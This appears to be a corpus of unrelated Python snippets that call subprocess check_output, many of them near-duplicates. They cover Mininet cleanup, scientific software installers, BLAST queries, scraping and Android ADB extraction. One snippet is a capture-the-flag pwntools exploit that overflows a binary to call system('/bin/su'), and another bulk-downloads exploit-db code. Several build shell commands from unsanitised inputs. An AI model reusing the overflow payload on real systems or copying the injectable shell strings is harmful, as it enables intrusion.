def downloadChapter(imageURLs): for line in imageURLs: try: co("curl -O -J \"" + line + "\"", shell=True) except Exception, e: print str(e) pass
def kill_mod_proc(cls): if cls.plot: cls.plot.closePlot() cls.killprocs('sumo-gui') cls.killprocs('hostapd') sleep(0.1) cls.sh('pkill babel') cls.sh('pkill wmediumd') sleep(0.1) info("\n*** Removing WiFi module and Configurations\n") try: co("lsmod | grep mac80211_hwsim", shell=True) os.system('rmmod mac80211_hwsim >/dev/null 2>&1') except: pass try: co("lsmod | grep ifb", shell=True) os.system('rmmod ifb') except: pass try: os.system('pkill -f \'wpa_supplicant -B -Dnl80211\'') except: pass if cls.socket_port: info('\n*** Done\n') cls.sh('fuser -k %s/tcp >/dev/null 2>&1' % cls.socket_port)
def install_nml2(): with working_dir(install_root): print co(['git', 'clone', 'https://github.com/NeuroML/NeuroML2.git']) with working_dir(default_nml2_dir): print co(['git', 'checkout', 'development']) inform('Successfully cloned NeuroML2', indent=2, verbosity=1)
def install_nml2(): with working_dir(install_root): print(co(['git', 'clone', 'https://github.com/NeuroML/NeuroML2.git'])) with working_dir(default_nml2_dir): print(co(['git', 'checkout', 'development'])) inform('Successfully cloned NeuroML2', indent=2, verbosity=1)
def install_jnml(): jnmlpath = os.path.join(os.environ['HOME'], 'jnml') os.mkdir(jnmlpath) with working_dir(jnmlpath): print co([ 'svn', 'checkout', 'svn://svn.code.sf.net/p/neuroml/code/jNeuroMLJar' ])
def cleanup_6lowpan(cls): """Clean up junk which might be left over from old runs; do fast stuff before slow dp and link removal!""" try: info("*** Removing fakelb module and Configurations\n") co("lsmod | grep fakelb", shell=True) os.system('rmmod fakelb') except: pass
def cleanup_mac802154(cls): """Clean up junk which might be left over from old runs; do fast stuff before slow dp and link removal!""" try: info("*** Removing mac802154_hwsim module and Configurations\n") co("lsmod | grep mac802154_hwsim", shell=True) os.system('rmmod mac802154_hwsim') except: pass
def cleanup_docker_containers(self): command1 = "docker ps | wc -l" output1 = co(command1, shell=True) if int(output1) > 1: command2 = "docker stop $(docker ps -a -q)" run(command2, shell=True) command3 = "docker ps -a | wc -l" output2 = co(command3, shell=True) if int(output2) > 1: command4 = "docker rm -f $(docker ps -a -q)" run(command4, shell=True)
def peptitle(accession,db='RPHs') : try : if type(accession) in [list,tuple,set] : out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%t"]).strip().split('\n') ; else : out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%t"]).strip() ; return out ; except CalledProcessError : return None ;
def peptitle(accession, db='RPHs'): try: if type(accession) in [list, tuple, set]: out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%t"]).strip().split('\n') else: out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%t"]).strip() return out except CalledProcessError: return None
def install_genesis(get_latest=False): genpath = os.path.join(os.environ['HOME'], 'genesis') os.mkdir(genpath) with working_dir(genpath): print co(['wget', 'https://github.com/borismarin/genesis2.4gamma/archive/master.zip']) print co(['unzip', 'master.zip']) print co(['ls', '-la', 'genesis2.4gamma-master']) os.chdir('genesis2.4gamma-master/src') print co(['./configure']) print co(['make']) open(os.path.join(os.environ['HOME'], '.simrc'), 'w').write(simrc)
def pepfetch(accession, db='RPHs'): try: if type(accession) in [list, tuple, set]: out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',tocsl(accession),'-outfmt',\ "%s"]).split() else: out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%s"]) return out except CalledProcessError: return None
def install_jlems(): install_root = os.environ['HOME'] with working_dir(install_root): print co(['git', 'clone', 'https://github.com/LEMS/jLEMS.git']) inform('Successfully cloned jLEMS', indent=2, verbosity=1) path = os.path.join(install_root, 'jLEMS') with working_dir(path): print co(['mvn', 'install']) inform('Successfully installed jLEMS', indent=2, verbosity=1)
def install_jlems(): install_root = os.environ['HOME'] with working_dir(install_root): print co(['git', 'clone', 'https://github.com/LEMS/jLEMS.git']) inform('Successfully cloned jLEMS', indent=2, verbosity=1) path = os.path.join(install_root,'jLEMS') with working_dir(path): print co(['mvn', 'install']) inform('Successfully installed jLEMS', indent=2, verbosity=1)
def install_genesis(get_latest=False): genpath = os.path.join(os.environ['HOME'], 'genesis') os.mkdir(genpath) with working_dir(genpath): print co([ 'wget', 'https://github.com/borismarin/genesis2.4gamma/archive/master.zip' ]) print co(['unzip', 'master.zip']) print co(['ls', '-la', 'genesis2.4gamma-master']) os.chdir('genesis2.4gamma-master/src') print co(['./configure']) print co(['make']) open(os.path.join(os.environ['HOME'], '.simrc'), 'w').write(simrc)
def check_phone(): try: s = co("ping -c 1 " + PHONE_IP + " | grep 'bytes from'", shell=True) except subprocess.CalledProcessError as e: return False sleep(0.5) return True
def process_info(info, site): if info['layout'] == 'mep': validate_mep(info) # site developers should have git an = co(["git", "log", "-1", "--format='%an'", info['fn']]) # decode to convert to unicode for both Python 2 and 2 an = an.decode('utf-8') an = an.strip("'\n") info['an'] = an at = co(["git", "log", "-1", "--format='%at'", info['fn']]) # decode to convert to unicode for both Python 2 and 2 at = at.decode('utf-8') at = at.strip("'\n") if at: at = datetime.date.fromtimestamp(int(at)) info['at'] = at
def append_old_to_new(gi2tax_map, newmap, concat_map, folder=FOLDER): paths = co("find %s -name '*.fna'" % folder, shell=True) if isinstance(paths, bytes): paths = paths.decode() paths = paths.split() ofh = open(concat_map, "w") ofw = ofh.write print("Length of accepted things: %i" % len(gi2tax_map)) found, missing = set(), set() for path in paths: sys.stderr.write("Processing path %s" % path) fl = xfirstline(path) ptoks = fl.split("|") name = ptoks[3] key = int(ptoks[1]) try: val = gi2tax_map[key] ofw("%s\t%i\n" % (name, val)) found.add(path) except KeyError: missing.add(int(fl.split("|")[1])) print("Missing: " + str(missing)) ofh.close() cc("cat %s >> %s" % (newmap, concat_map), shell=True) return concat_map, found
def calc_screen_light_mean_color(): co("scrot -t 3% /tmp/real_test.png", shell=True) red = np.asarray(imread("/tmp/real_test-thumb.png")) print(red, red.shape) original_shape = red.shape # so we can reshape the labels later W = red.shape[0] H = red.shape[1] red = red.flatten().reshape(W * H, 3) print(red, red.shape) samples = red clf = sklearn.cluster.KMeans(n_clusters=3) labels = clf.fit_predict(samples).flatten().reshape(W, H) print(labels.shape) print(labels) # import matplotlib.pyplot as plt # plt.imshow(labels) # plt.show() red = red.flatten().reshape(W, H, 3) # plt.imshow(red) # plt.show() mean_color = [0] * 3 for i in range(3): print("red:", red[labels == i]) mean_color[i] = np.mean(red[labels == i], axis=(0)) print("mean_color:", mean_color) mean_avg_arr = [sum(x) / 3 for x in mean_color] light_mean = mean_color[mean_avg_arr.index(max(mean_avg_arr))] max_elems_arr = [len(red[labels == x]) for x in range(3)] light_mean = mean_color[max_elems_arr.index(max(max_elems_arr))] print("light_mean:", light_mean) for i in range(W): for j in range(H): red[i, j] = mean_color[labels[i, j]] # plt.imshow(red) # plt.show() return (int(x) for x in light_mean)
def send(x, y, color): run = src % (x, y, color) ans = co(run, shell=True) try: print "%s paint at (%3d,%3d) with %d" % ("Succ" if parse(ans)["flag"] else "Fail", x, y, color) except: print "ERROR"
def install_neuron(version): if not version: version = '7.6' nrnpath = os.path.join(os.environ['HOME'], 'neuron') inform('Installing NEURON %s into %s' % (version, nrnpath), indent=1) os.mkdir(nrnpath) with working_dir(nrnpath): print( co([ 'wget', 'https://www.neuron.yale.edu/ftp/neuron/versions/v%s/nrn-%s.tar.gz' % (version, version) ])) print(co(['tar', 'xzvf', 'nrn-%s.tar.gz' % version])) print(co(['mv', 'nrn-%s' % version, 'nrn'])) os.chdir('nrn') path = os.getcwd() pyexec = sys.executable co([ "./configure --prefix=%s --without-iv --with-nrnpython=%s" % (path, pyexec) ], shell=True) print(co(['make', '-j4'])) print(co(['make', 'install'])) os.chdir('src/nrnpython') run_setup('./setup.py', ['install'])
def cleanup_wifi(cls): """Clean up junk which might be left over from old runs; do fast stuff before slow dp and link removal!""" info("*** Removing WiFi module and Configurations\n") try: co("lsmod | grep mac80211_hwsim", shell=True) os.system('rmmod mac80211_hwsim') except: pass try: co("lsmod | grep ifb", shell=True) os.system('rmmod ifb') except: pass killprocs('hostapd') if glob.glob('*-mn-telemetry.txt'): os.system('rm *-mn-telemetry.txt') if glob.glob('*.apconf'): os.system('rm *.apconf') if glob.glob('*.staconf'): os.system('rm *.staconf') if glob.glob('*wifiDirect.conf'): os.system('rm *wifiDirect.conf') if glob.glob('*.nodeParams'): os.system('rm *.nodeParams') try: os.system('pkill -f \'wpa_supplicant -B -Dnl80211\'') except: pass try: os.system('pkill -f \'babeld\'') except: pass info("*** Killing wmediumd\n") sh('pkill wmediumd') sixlowpan.cleanup_6lowpan()
def peplen(accession, db='RPHs'): try: if accession is None: return None if type(accession) in [list, tuple, set]: out = list() for acc in accession: out.append(int(co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',tocsl(accession),'-outfmt',\ "%l"]).strip())) else: out=int(co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%l"]).strip()) return out except CalledProcessError: return None
def peplen(accession,db='RPHs') : try : if accession is None : return None ; if type(accession) in [list,tuple,set] : out=list() ; for acc in accession : out.append(int(co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',tocsl(accession),'-outfmt',\ "%l"]).strip())) ; else: out=int(co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%l"]).strip()) ; return out ; except CalledProcessError : return None ;
def getChapterImages(url): imageURLsReturn = [] try: response = co("curl \"" + url + "\"", shell=True) responseDataSplit = response.split('\n') for line in responseDataSplit: imageURL = re.findall("\s+lstImages.push\(\"(.+)\"\);", line) if(len(imageURL) > 0): imageURLsReturn.append(imageURL[0]) except Exception, e: print str(e) pass
def cleanup_wifi(cls): """Clean up junk which might be left over from old runs; do fast stuff before slow dp and link removal!""" info("*** Removing WiFi module and Configurations\n") try: co("lsmod | grep mac80211_hwsim", shell=True) os.system('rmmod mac80211_hwsim') except: pass try: co("lsmod | grep ifb", shell=True) os.system('rmmod ifb') except: pass killprocs('hostapd') if glob.glob("*.apconf"): os.system('rm *.apconf') if glob.glob("*.staconf"): os.system('rm *.staconf') if glob.glob("*wifiDirect.conf"): os.system('rm *wifiDirect.conf') if glob.glob("*.nodeParams"): os.system('rm *.nodeParams') try: os.system('pkill -f \'wpa_supplicant -B -Dnl80211\'') except: pass info("*** Killing wmediumd\n") sh('pkill wmediumd') sixlowpan.cleanup_6lowpan()
def pepfasta(accession,db='RPHs',asTuple=False) : # this one is NOT ok with lists try: if asTuple : out=list(co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%f"]).strip().split('\n')) ; defline=out[0] ; seq="" for line in out[1:len(out)] : seq += line.strip() ; return (defline,seq) ; else : out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%f"]) ; return out ; except CalledProcessError : return None ;
def pepfasta(accession, db='RPHs', asTuple=False): # this one is NOT ok with lists try: if asTuple: out=list(co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%f"]).strip().split('\n')) defline = out[0] seq = "" for line in out[1:len(out)]: seq += line.strip() return (defline, seq) else: out=co(['blastdbcmd','-db',db,'-dbtype','prot','-entry',accession,'-outfmt',\ "%f"]) return out except CalledProcessError: return None
def killprocs(pattern): "Reliably terminate processes matching a pattern (including args)" sh('pkill -9 -f %s' % pattern) # Make sure they are gone while True: try: pids = co(['pgrep', '-f', pattern]) except CalledProcessError: pids = '' if pids: sh('pkill -9 -f %s' % pattern) time.sleep(.5) else: break
def killprocs( pattern ): "Reliably terminate processes matching a pattern (including args)" sh( 'pkill -9 -f %s' % pattern ) # Make sure they are gone while True: try: pids = co( [ 'pgrep', '-f', pattern ] ) except CalledProcessError: pids = '' if pids: sh( 'pkill -9 -f %s' % pattern ) time.sleep( .5 ) else: break
def killprocs( pattern ): "Reliably terminate processes matching a pattern (including args)" sh( 'pkill -9 -f %s' % pattern ) # Make sure they are gone while True: try: pids = co( 'pgrep -f %s' % pattern ) except: pids = '' if pids: sh( 'pkill -f 9 mininet:' ) sleep( .5 ) else: break
def killprocs(pattern): "Reliably terminate processes matching a pattern (including args)" sh('pkill -9 -f %s' % pattern) # Make sure they are gone while True: try: pids = co('pgrep -f %s' % pattern) except: pids = '' if pids: sh('pkill -f 9 mininet:') time.sleep(.5) else: break
def killprocs(pattern): "Reliably terminate processes matching a pattern (including args)" sh("pkill -9 -f %s" % pattern) # Make sure they are gone while True: try: pids = co(["pgrep", "-f", pattern]) except CalledProcessError: pids = "" if pids: sh("pkill -9 -f %s" % pattern) time.sleep(0.5) else: break
def install_neuron(get_latest=False): nrnpath = os.path.join(os.environ['HOME'],'neuron') inform('Installing NEURON into %s'%nrnpath, indent=1) os.mkdir(nrnpath) with working_dir(nrnpath): if get_latest: print(co(['git', 'clone', 'https://github.com/neuronsimulator/nrn'])) os.chdir('nrn') print(co(['./build.sh'])) else: print(co(['wget', 'https://www.neuron.yale.edu/ftp/neuron/versions/v7.4/nrn-7.4.tar.gz'])) print(co(['tar', 'xzvf', 'nrn-7.4.tar.gz'])) print(co(['mv', 'nrn-7.4', 'nrn'])) os.chdir('nrn') path = os.getcwd() pyexec = 'python2' #sys.executable co(["./configure --prefix=%s --without-iv --without-paranrn --with-nrnpython=%s"%(path,pyexec)], shell=True) print(co(['make'])) print(co(['make', 'install'])) os.chdir('src/nrnpython') run_setup('./setup.py', ['install'])
def check(pname): time_x = [] mem_used = [] start = time.time() mem_info = os.popen('free -h').read().split() mem_all = mem_info[7][:-1] result = os.popen('ps ax | grep ' + pname + ' | grep -v grep | grep -v python').read().split() while True: time_x.append(time.time() - start) mem_used.append(get_mem_used()) result = os.popen('ps ax | grep ' + pname + ' | grep -v grep | grep -v python').read().split() if not len(result): break time.sleep(1) os.system('kill ' + co('ps -ax | grep "/usr/bin/collectl" | grep -v grep | grep -v python', shell = True).decode().lstrip().split(' ')[0]) with open("mem" + os.getenv("HOSTNAME")[-1] + ".log", "w") as f: for i in range(len(mem_used)): f.write(str(mem_all) + ", " + str(time_x[i]) + ", " + str(mem_used[i]) + "\n")
def getpid(name=TEST_PNAME): try: o = co(['ps', '-fC', name]).decode() ol = o.split('\n') del ol[0] for item in ol: il = item.split(' ') il_ = [] for prop in il: if prop != '': il_.append(prop) if il_ != []: user, pid, ppid, c, stime, tty, time = il_[:7] cmd = ' '.join(il_[7:]) return int(pid), '' except CalledProcessError as e: return None, f'{name!r} nicht gefunden'
def getMangaInfo(url): chapterURLs = [] chapterURLsReturn = [] mangaTitle = "gg" try: response = co("curl \"" + url + "\"", shell=True) responseDataSplit = response.split('\n') for line in responseDataSplit: mangaTitles = re.findall("<a Class=\"bigChar\" href=\"(.+)\">(.+)</a>", line) if(len(mangaTitles) > 0):\ mangaTitle = mangaTitles[0][1] chapterURL = re.findall("<a href=\"(.+)\" title=\"Read (.+) online\">", line) if(len(chapterURL) > 0): chapterURLsReturn.append({"url":"http://kissmanga.com" + str(chapterURL[0][0]), "name":str(chapterURL[0][1])}) except Exception, e: print str(e) pass
def main(): args = getopts() gi2tax = get_gi2tax(args.folder) if args.no_download is False: fetch_genomes(args.folder) print("Getting acceptable taxids") taxmap = build_full_taxmap(args.taxonomy) acceptable_taxids = get_acceptable_taxids(taxmap) print("Appending old to new") concat, found = append_old_to_new(parse_gi2tax(gi2tax, acceptable_taxids), args.new_refseq_nameid_map, args.combined_nameid_map, args.folder) cc("sort {0} | uniq > tmp.zomg && mv tmp.zomg {0}".format(concat), shell=True) nl = int(co("wc -l %s" % concat, shell=True).decode().split()[0]) sys.stderr.write("Concatenated file of total lines " "%i is written to %s.\n" % (nl, concat)) with open(args.found if args.found else "found_paths.txt", "w") as f: for path in found: f.write(path + "\n") return 0
def check(pname): time_x = [] mem_used = [] start = time.time() mem_info = os.popen('free -h').read().split() mem_all = mem_info[7][:-1] result = os.popen('ps ax | grep ' + pname + ' | grep -v grep | grep -v python').read().split() while True: time_x.append(time.time() - start) mem_used.append(get_mem_used()) result = os.popen('ps ax | grep ' + pname + ' | grep -v grep | grep -v python').read().split() if not len(result): break time.sleep(1) os.system('kill ' + co('ps -ax | grep "/usr/bin/collectl" | grep -v grep | grep -v python', shell = True).decode().lstrip().split(' ')[0]) with open("mem" + os.getenv("HOSTNAME")[-1] + ".log", "w") as f: for i in range(len(mem_used)): f.write(str(mem_all) + ", " + str(time_x[i]) + ", " + str(mem_used[i]) + "\n") if __name__ == '__main__': res = '' Process(target = check, args = ('benchmark_parconnect',)).start() try: res = co('collectl -sx', shell=True).decode() except Exception: pass print(res) with open("infiniband" + os.getenv("HOSTNAME")[-1] + ".log", "w") as f: f.write(res)
#!/usr/bin/python from subprocess import check_output as co from sys import exit # Actually run bin/mn rather than importing via python path version = 'Mininet ' + co( 'PYTHONPATH=. bin/mn --version', shell=True ) version = version.strip() # Find all Mininet path references lines = co( "grep -or 'Mininet \w\+\.\w\+\.\w\+[+]*' *", shell=True ) error = False for line in lines.split( '\n' ): if line and 'Binary' not in line: fname, fversion = line.split( ':' ) if version != fversion: print "%s: incorrect version '%s' (should be '%s')" % ( fname, fversion, version ) error = True if error: exit( 1 )
def filter_call(cstr, fp): instr = co(cstr, shell=True, stderr=fp, executable="/bin/bash").decode() return [line for line in instr.split('\n') if "error" in line.lower()]
group.add_argument('--public', action='store_const', const=True) group.add_argument('--private', action='store_const', const=False) parser.add_argument('user_id', help='user id of new owner', type=int) args = parser.parse_args() if args.folder_id is not None and args.folder_id == 0: print 'not valid for root' sys.exit(1) if args.folder_name is not None and args.folder_name == 'root': print 'not valid for root' sys.exit(1) sql = "copy (select * from users where id='%s') to stdout csv" % args.user_id cmd = ['sudo', '-u', 'postgres', 'psql', '-d', 'hoot', '-c', sql] stdout = co(cmd, stderr=devnull) if len(stdout) == 0: print 'user %s not found' % args.user_id sys.exit(1) if args.folder_name is not None: sql = "copy (select count(1) from folders where display_name = '%s') to stdout csv" % args.folder_name cmd = ['sudo', '-u', 'postgres', 'psql', '-d', 'hoot', '-c', sql] stdout = co(cmd, stderr=devnull) rows = stdout.split('\n') row = rows[0] count = int(row) if count > 1: print 'folder name collides, cannot continue w/ display_name' sys.exit(1)
raw_url = github_repo.link_to_raw_file_in_repo(".travis.yml") print(" .travis.yml found at %s\n" % raw_url) contents = osb.utils.get_page(raw_url) if 'omv' not in contents: print("That .travis.yml does not look like it uses OMV...") non_omv_tests += 1 else: testable_projects += 1 test_it = True else: print(" (No .travis.yml)") if test_it: target_dir = '%s/%s' % (test_dir, proj_id) print co(['git', 'clone', str(github_repo.clone_url), target_dir]) with working_dir(target_dir): if proj_id in branches.keys(): print co(['git', 'checkout', branches[proj_id]]) print "Running 'omv all' on", target_dir test_all() passing_projects += 1 print("\nSo far: %i projects with OMV tests which pass\n" % (passing_projects)) end = datetime.datetime.now() print( "\n%i projects checked, of which %i have OMV tests (%i non-OMV tested projects) and %i passed with OMV in %s seconds\n"
from pwn import * from subprocess import check_output as co p = process("./kudanil_lsi") p.sendline("") e = ELF('./kudanil_lsi') binsu = next(e.search('/bin/su')) system_plt = e.plt['system'] s = p.recvuntil("su") s = s.split("\n")[-11:] s = "\n".join(s) print s f = open('map', 'w') f.write(s) f.close() solution = co('cat map | ./map.solution', shell=True) for c in range(0, len(solution)): p.sendline(solution[c]) payload = "A" * 23 + p32(system_plt) + 'BBBB' + p32(binsu) p.sendline(payload) p.interactive()
def bestPep(seq,db='RPHs') : return co('echo "' + seq + '" | blastp -db ' + db + ' -evalue 0.01 -outfmt "6 sacc" -query /dev/stdin | head -n1',shell=True).decode('utf-8').strip() ;
def run(*args, **kwargs): "Run co and decode for python3" result = co(*args, **kwargs) return result.decode() if version_info[ 0 ] >= 3 else result
def call(cmd): args = { 'shell': True, 'executable': '/bin/bash' } if isinstance(cmd, str) else {} return co(cmd, **args).decode()
#!/usr/bin/env python3 # coding: utf-8 # In[ ]: from subprocess import check_output as co import re, requests headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' } # In[ ]: keyword = input('term to search for in exploit-db: ') # In[ ]: exploits = str(co(['searchsploit', keyword, '-w', '-t']), 'utf-8') raw = re.sub('exploits', 'raw', exploits) url_list = re.findall(r'https://www.*', raw) for x in url_list: with open('{}'.format(x.split('/')[-2]), 'w') as f: f.write(requests.get(x, headers=headers).text) # In[ ]:
#!/usr/bin/python from subprocess import check_output as co from sys import exit # Actually run bin/mn rather than importing via python path version = 'Mininet ' + co( 'PYTHONPATH=. bin/mn --version 2>&1', shell=True ) version = version.strip() # Find all Mininet path references lines = co( "egrep -or 'Mininet [0-9\.\+]+\w*' *", shell=True ) error = False for line in lines.split( '\n' ): if line and 'Binary' not in line: fname, fversion = line.split( ':' ) if version != fversion: print( "%s: incorrect version '%s' (should be '%s')" % ( fname, fversion, version ) ) error = True if error: exit( 1 )
def install_jnml(): jnmlpath = os.path.join(os.environ['HOME'],'jnml') os.mkdir(jnmlpath) with working_dir(jnmlpath): print(co(['svn', 'checkout', 'https://svn.code.sf.net/p/neuroml/code/jNeuroMLJar']))
def download_database(DB_PATH): DB_NAME = DB_PATH.split("/")[-1] if co([ADB, "shell", SUC, "ls", DB_PATH]).decode("UTF-8").replace("\r", "").replace("\n", "") == DB_PATH: if "su" in PERM: co([ADB, "shell", SUC, "dd", "if=" + DB_PATH, "of=/data/local/tmp/" + DB_NAME]) co([ADB, "shell", SUC, "chmod", "777", "/data/local/tmp/" + DB_NAME]) co([ADB, "pull", "/data/local/tmp/" + DB_NAME, OUTPUT + SEP + "db" + SEP + DB_NAME]) co([ADB, "shell", SUC, "rm", "/data/local/tmp/" + DB_NAME]) else: co([ADB, "pull", DB_PATH, OUTPUT + SEP + "db" + SEP + DB_NAME]) if os.path.isfile(OUTPUT + SEP + "db" + SEP + DB_NAME) == True: fileh = open(OUTPUT + SEP + "db" + SEP + "md5sums", "a") DB_MD5 = hashlib.md5(open(OUTPUT + SEP + "db" + SEP + DB_NAME, "rb").read()).hexdigest() DLLS.append(DB_NAME) # ; DLLS.append(DB_MD5) fileh.write(DB_MD5 + "\t" + DB_NAME + "\n") fileh.close()
os.chmod(ADB, "0755") else: sys.exit(download_adb) elif OS_CHECK == "win32": ADB = "adb.exe" SEP = "\\" if os.path.isfile(ADB) == False: sys.exit(download_adb) elif OS_CHECK == "darwin": ADB = "./adb_mac" SEP = "/" if os.path.isfile(ADB) == False: sys.exit(download_adb) try: ADB co([ADB, "start-server"]) except NameError: sys.exit(" Cannot determine OS!") # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Unrooted (shell) devices, to print device information, limited extractions # print("\033[94m>>>>>>>>>> General Device Information.\033[0m") # Check for connected Android device if "unknown" in co([ADB, "get-state"]).decode("UTF-8"): sys.exit("\033[91m No Android device found!\033[0m") else: ADB_SER = co([ADB, "get-serialno"]).decode("UTF-8").replace("\n", "").replace("\r", "") print(" ADB serial: " + ADB_SER) REPORT.append(["ADB serial", ADB_SER])
raw_url = github_repo.link_to_raw_file_in_repo(".travis.yml") print(" .travis.yml found at %s\n" % raw_url) contents = osb.utils.get_page(raw_url) if 'omv' not in contents: print("That .travis.yml does not look like it uses OMV...") non_omv_tests += 1 else: testable_projects += 1 test_it = True else: print(" (No .travis.yml)") if test_it: target_dir = '%s/%s' % (test_dir, proj_id) print(co(['git', 'clone', str(github_repo.clone_url), target_dir])) with working_dir(target_dir): for key in branches.keys(): if proj_id.lower() == key: print(co(['git', 'checkout', branches[key]])) print("Running 'omv all' on"+ target_dir) test_all() passing_projects += 1 print("\nSo far: %i projects with OMV tests which pass\n" % (passing_projects)) end = datetime.datetime.now() print("\n%i projects checked, of which %i have OMV tests (%i non-OMV tested projects) and %i passed with OMV in %s seconds\n" % (projects, testable_projects, non_omv_tests, passing_projects, (end - start).seconds))
def get_clipboard(): return co([CB]).decode()
def maintainer(current_file): """Write the maintainer name found in makepkf.conf in file's start""" current_file.seek(0, 0) maint = co('grep PACKAGER /etc/makepkg.conf', shell=True).split('"')[1] current_file.write("# Contributor: "+maint+"\n\n")
raw_url = github_repo.link_to_raw_file_in_repo(".travis.yml") print(" .travis.yml found at %s\n" % raw_url) contents = osb.utils.get_page(raw_url) if 'omv' not in contents: print("That .travis.yml does not look like it uses OMV...") non_omv_tests += 1 else: testable_projects += 1 test_it = True else: print(" (No .travis.yml)") if test_it: target_dir = '%s/%s' % (test_dir, proj_id) print co(['git', 'clone', str(github_repo.clone_url), target_dir]) with working_dir(target_dir): if proj_id in branches.keys(): print co(['git', 'checkout', branches[proj_id]]) print "Running 'omv all' on", target_dir test_all() passing_projects += 1 print("\nSo far: %i projects with OMV tests which pass\n" % (passing_projects)) end = datetime.datetime.now() print("\n%i projects checked, of which %i have OMV tests (%i non-OMV tested projects) and %i passed with OMV in %s seconds\n" % (projects, testable_projects, non_omv_tests, passing_projects, (end - start).seconds))
def install_neuron(get_latest=False): nrnpath = os.path.join(os.environ['HOME'],'neuron') os.mkdir(nrnpath) with working_dir(nrnpath): if get_latest: print co(['hg', 'clone', 'http://www.neuron.yale.edu/hg/neuron/nrn']) os.chdir('nrn') print co(['./build.sh']) else: print co(['wget', 'http://www.neuron.yale.edu/ftp/neuron/versions/v7.3/nrn-7.3.tar.gz']) print co(['tar', 'xzvf', 'nrn-7.3.tar.gz']) print co(['mv', 'nrn-7.3', 'nrn']) os.chdir('nrn') path = os.getcwd() pyexec = sys.executable co(["./configure --prefix=%s --without-iv --with-nrnpython=%s"%(path,pyexec)], shell=True) print co(['make']) print co(['make', 'install']) os.chdir('src/nrnpython') run_setup('./setup.py', ['install'])
def cleanup(): """Clean up junk which might be left over from old runs; do fast stuff before slow dp and link removal!""" info("*** Removing excess controllers/ofprotocols/ofdatapaths/pings/noxes" "\n") zombies = 'controller ofprotocol ofdatapath ping nox_core lt-nox_core ' zombies += 'ovs-openflowd ovs-controller udpbwtest mnexec ivs' # Note: real zombie processes can't actually be killed, since they # are already (un)dead. Then again, # you can't connect to them either, so they're mostly harmless. # Send SIGTERM first to give processes a chance to shutdown cleanly. sh( 'killall ' + zombies + ' 2> /dev/null' ) time.sleep(1) sh( 'killall -9 ' + zombies + ' 2> /dev/null' ) # And kill off sudo mnexec sh( 'pkill -9 -f "sudo mnexec"') info( "*** Removing junk from /tmp\n" ) sh( 'rm -f /tmp/vconn* /tmp/vlogs* /tmp/*.out /tmp/*.log' ) info( "*** Removing old X11 tunnels\n" ) cleanUpScreens() info( "*** Removing excess kernel datapaths\n" ) dps = sh( "ps ax | egrep -o 'dp[0-9]+' | sed 's/dp/nl:/'" ).splitlines() for dp in dps: if dp: sh( 'dpctl deldp ' + dp ) info( "*** Removing OVS datapaths" ) dps = sh("ovs-vsctl --timeout=1 list-br").strip().splitlines() if dps: sh( "ovs-vsctl " + " -- ".join( "--if-exists del-br " + dp for dp in dps if dp ) ) # And in case the above didn't work... dps = sh("ovs-vsctl --timeout=1 list-br").strip().splitlines() for dp in dps: sh( 'ovs-vsctl del-br ' + dp ) info( "*** Removing all links of the pattern foo-ethX\n" ) links = sh( "ip link show | " "egrep -o '([-_.[:alnum:]]+-eth[[:digit:]]+)'" ).splitlines() for link in links: if link: sh( "ip link del " + link ) info( "*** Killing stale mininet node processes\n" ) sh( 'pkill -9 -f mininet:' ) # Make sure they are gone while True: try: pids = co( 'pgrep -f mininet:'.split() ) except: pids = '' if pids: sh( 'pkill -f 9 mininet:' ) sleep( .5 ) else: break info( "*** Cleanup complete.\n" )
#!/usr/bin/python from subprocess import check_output as co from sys import exit # Actually run bin/mn rather than importing via python path version = "Mininet " + co("PYTHONPATH=. bin/mn --version", shell=True) version = version.strip() # Find all Mininet path references lines = co("egrep -or 'Mininet [0-9\.\+]+\w*' *", shell=True) error = False for line in lines.split("\n"): if line and "Binary" not in line: fname, fversion = line.split(":") if version != fversion: print("%s: incorrect version '%s' (should be '%s')" % (fname, fversion, version)) error = True if error: exit(1)